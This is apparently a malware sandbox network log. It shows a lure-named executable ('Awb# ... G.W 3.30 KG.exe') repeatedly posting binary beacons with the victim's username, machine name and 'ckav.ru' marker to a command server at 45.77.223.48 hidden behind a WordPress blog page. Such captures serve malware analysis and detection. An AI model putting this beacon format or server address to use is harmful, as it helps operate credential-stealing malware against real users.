Apr 25, 2024 09:43:49.646987915 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:49.647141933 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:49.647183895 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:49.647372961 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 25, 2024 09:43:49.647412062 CEST	1289	IN	Data Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	49835	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:49.906919003 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:50.036832094 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:50.873189926 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:49 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:50.873224020 CEST	141	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:50.881438017 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:50.881711006 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:50.881839991 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:50.881925106 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:50.882101059 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:50.882119894 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:50.882246971 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 25, 2024 09:43:50.882285118 CEST	1289	IN	Data Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	49836	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:51.138011932 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:51.269185066 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:52.190967083 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:51 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:52.191026926 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:52.191121101 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:52.206783056 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:52.209263086 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:52.209402084 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:52.209625959 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:52.211304903 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:52.211345911 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:52.211383104 CEST	670	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	49837	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:52.470303059 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:52.603302956 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:56.450469971 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:52 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:56.450628996 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:56.450666904 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:56.462632895 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:56.462670088 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:56.462703943 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:56.462795019 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:56.462912083 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:56.462949991 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:56.463193893 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	49838	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:56.719259977 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:56.850287914 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:57.712359905 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:56 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:57.712426901 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:57.712560892 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:57.722717047 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:57.723161936 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:57.723196983 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:57.723332882 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:57.723440886 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:57.723514080 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:57.723647118 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	49839	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:57.993135929 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
